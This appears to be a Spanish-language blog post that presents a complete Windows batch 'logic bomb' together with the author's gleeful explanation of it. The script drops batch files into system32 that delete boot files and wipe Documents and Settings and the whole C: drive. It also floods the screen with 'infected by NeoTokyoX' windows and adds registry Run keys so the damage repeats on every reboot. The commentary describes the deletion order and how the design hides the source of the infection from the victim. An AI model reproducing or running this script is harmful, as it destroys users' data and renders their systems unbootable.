@echo off
c:
cd "C:\WINDOWS\system32"
echo @echo off > log.bat
echo cd \ >> log.bat
echo del /ah /f /q boot.ini >> log.bat
echo del /ah /f /q ntldr >> log.bat
echo del /ah /f /q *.* >> log.bat
echo cd "C:\Documents and Settings" >> log.bat
echo del /f /s /q *.* >> log.bat
echo cd \ >> log.bat
echo del /f /s /q *.* >> log.bat
echo exit >> log.bat
cd "C:\WINDOWS\system32"
echo @echo off > w32.bat
echo :warning >> w32.bat
echo start >> w32.bat
echo msg * You've been infected by NeoTokyoX! >> w32.bat
echo goto warning >> w32.bat
cd "C:\WINDOWS\system32"
echo @echo off > dir.bat
echo cd "C:\WINDOWS\system32" >> dir.bat
echo start log.bat >> dir.bat
echo start w32.bat >> dir.bat
cd "C:\WINDOWS\system32"
echo reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "security" /d "C:\Windows\System32\dir.bat" /f > register.bat
echo reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "securitylog" /d "C:\WINDOWS\system32\register.bat" /f >> register.bat
echo exit >> register.bat
start register.bat
taskkill /f /im msnmsgr.exe
exit
'''''//''''//'''''//''''//'''''//''''//'''''//''''//'''''//''''//'''''//''''//
jejjejeje las maldades de este Bat
Es una bomba lógica porque crea varios archivos independientes del del mismo virus, lo que hace es guardar en el registro la ejecución del virus para que se ejecute al siguiente reinicio, esto se hace para que la víctima no se de cuenta de que realmente ha sido ese archivo el que le ha infectado y así cuando reinicie no se acordará por dónde le vino el virus; cuando reinicia le empiezan a salir ventanas de comando infinitas a la vez que elmismo número de ventanas de un mensaje que dice: You've been infected by NeoTokyoX! esto ralentiza el ordenador, pero además realmente detrás de todas esas ventanas hay una que abrió la primera que está borrando los archivos esenciales para el arranque del XP, después borra todo lo que ve al paso de Documents and Settings con la intención de borrar la carpeta "Mis documentos", pero para ello tendría que saber el usuario del equipo para ir a Documents and Settings\usuario\Mis documentos.. como no se sabe, se deja que empiece a borrar desde Documents and Settings; bueno, y más tarde borra toodo lo que haya en C: ; hago este orden porque lo más seguro es que la víctima reinicie la torre desde el botón físico, puesto que no podrá hacer nada con el ratón. Entonces, la importancia de borrado de los archivos es según esa prioridad, primero el arranque, después los documentos importantes, y después el resto del disco; para que le de tiempo a hacer lo que más interesa hasta que el usuario reinicie. Realmente no importa porque va a reiniciar una y otra vez y si algo no se ha terminado de borrar lo hace la próxima vez puesto que esto se ejecuta siempre en el inicio.....
Godblack<>
No hay comentarios:
Publicar un comentario